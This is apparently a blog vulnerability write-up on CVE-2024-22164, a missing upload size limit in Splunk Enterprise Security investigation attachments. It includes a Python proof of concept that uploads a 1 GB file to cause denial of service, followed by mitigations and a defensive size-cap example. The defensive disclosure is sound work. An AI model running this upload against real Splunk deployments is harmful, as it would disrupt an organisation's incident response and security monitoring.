Splunk is a household name for organizations needing powerful log management and security operations. Their Splunk Enterprise Security (ES) app is often at the heart of Security Operations Centers, providing investigation tracking, correlation searches, and powerful dashboards.
Recently, a security issue tracked as CVE-2024-22164 was disclosed affecting Splunk Enterprise Security versions prior to 7.1.2. The flaw is simple in concept: a missing size limit on attachment uploads can lead to a denial of service (DoS) against security investigations.
The Vulnerability: What Happened?
In Splunk ES, security analysts often use the *Investigation* feature to document and organize evidence when responding to incidents. They can upload attachments, such as screenshots or exported logs, to these investigations.
The problem?
The server endpoint responsible for handling these file uploads (the “attachments” endpoint) does not limit the size of incoming files. That means an attacker—even one with only analyst access—could upload a huge file.
If abused:
A malicious upload will cause the investigation process to choke. Large files can consume all available disk and memory allocated for the investigation. Eventually, this causes the investigation to crash, hang, or become otherwise inaccessible to legitimate users.
Proof of Concept (PoC): How Could It Be Exploited?
Below is a simple proof-of-concept using Python’s requests library to simulate a huge file upload against a vulnerable Splunk Enterprise Security instance.
```python
import requests

# Change these values
splunk_url = 'https://your-splunk-server:800'
username = 'your_username'
password = 'your_password'

# Authenticate with HTTP basic auth
auth = (username, password)

# Prepare a large payload (e.g., 1GB of zeros)
payload = b'\x00' * 1024 * 1024 * 1024  # 1GB

# File data to upload (field name, filename, content, MIME type)
files = {
    'attachment': ('bigfile.bin', payload, 'application/octet-stream')
}

# The endpoint for investigation attachments (you'll need a valid investigation ID)
investigation_id = "example_id"
endpoint = f"{splunk_url}/en-US/splunkd/__raw/servicesNS/nobody/SplunkEnterpriseSecuritySuite/ess_Investigation/attachment/{investigation_id}"

# Upload the huge file
response = requests.post(endpoint, auth=auth, files=files, verify=False)
print("Server response:", response.status_code, response.text)
```
Disclaimer:
Never use this code on production systems without explicit permission. It can disrupt security operations.
- Inaccessible investigations: Teams can’t open investigation details until manual intervention.
- Resource drain: Excessive server RAM/CPU usage can impact Splunk dashboards, searches, and alerting.
- Potential for wider DoS: Aggressive exploitation can fill up disk quotas, affecting the entire Splunk deployment.
Mitigation
Splunk fixed this in Enterprise Security 7.1.2 (see the release notes), which introduces proper size checks on attachment uploads.
1. Update ASAP: Upgrade Splunk ES to version 7.1.2 or newer.
2. Monitor: Watch storage utilization and investigation system logs for abnormal attachment upload activity.
3. Limit access: Restrict investigation editing/upload permissions where possible.
4. WAF and Reverse Proxy: If you can’t patch quickly, configure a proxy to block or limit large file uploads to Splunk’s investigation endpoints.
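The fix in 7.1.2 and the proxy workaround above both come down to the same control: a hard cap on attachment size, enforced before the body is buffered. Splunk's implementation is not public, so as an added example (not Splunk's code) here is how an upload handler enforces such a cap; the 10 MiB limit and the `read_attachment`/`check_upload` helpers are assumptions for illustration. The cap is enforced twice, because the declared `Content-Length` may be absent (chunked transfer) or understated.

```python
import io

MAX_ATTACHMENT_BYTES = 10 * 1024 * 1024  # assumed 10 MiB policy limit, not Splunk's value


class AttachmentTooLarge(Exception):
    """Raised when an upload exceeds the configured limit."""


def read_attachment(stream, content_length=None, limit=MAX_ATTACHMENT_BYTES, chunk_size=64 * 1024):
    """Read an upload body from `stream`, enforcing `limit` bytes.

    Check 1: reject an honestly declared oversized Content-Length before
    reading anything. Check 2: count bytes while streaming, so a missing
    or understated Content-Length cannot bypass the cap. The whole body
    is never buffered before the check, which is the defect that made
    the unpatched endpoint exhaust disk and memory.
    """
    if content_length is not None and content_length > limit:
        raise AttachmentTooLarge(f"declared {content_length} bytes > limit {limit}")
    buf = io.BytesIO()
    total = 0
    while True:
        # Never read more than one byte past the limit; that byte proves overflow.
        chunk = stream.read(min(chunk_size, limit - total + 1))
        if not chunk:
            break
        total += len(chunk)
        if total > limit:
            raise AttachmentTooLarge(f"body exceeded limit {limit} after {total} bytes")
        buf.write(chunk)
    return buf.getvalue()


def check_upload(body, declared_length=None, limit=MAX_ATTACHMENT_BYTES):
    """Wrap an in-memory (constructed) body as a stream and report the outcome."""
    try:
        data = read_attachment(io.BytesIO(body), declared_length, limit)
        return ("accepted", len(data))
    except AttachmentTooLarge as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # Constructed sample uploads against a 1 KiB limit for demonstration.
    print(check_upload(b"\x00" * 512, declared_length=512, limit=1024))
    print(check_upload(b"\x00" * 4096, declared_length=4096, limit=1024))  # declared too big
    print(check_upload(b"\x00" * 4096, declared_length=100, limit=1024))   # lying header
    print(check_upload(b"\x00" * 4096, declared_length=None, limit=1024))  # chunked, no header
```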
References
- Splunk CVE Advisory: https://advisory.splunk.com/advisories/SVD-2024-0212
- Splunk ES Release Notes v7.1.2: https://docs.splunk.com/Documentation/ES/7.1.2/RN/ESRN
- NIST NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-22164
Summary
CVE-2024-22164 is a critical “low hanging fruit” bug—no special hacking skills required! Anyone with permissions to attach files in Splunk ES investigations can effectively take down core investigation workflows by uploading gigantic files.
Patch promptly and remind your teams never to trust file content or size from users, even trusted insiders.
Timeline
Published on: 01/09/2024 17:15:12 UTC
Last modified on: 01/16/2024 17:40:17 UTC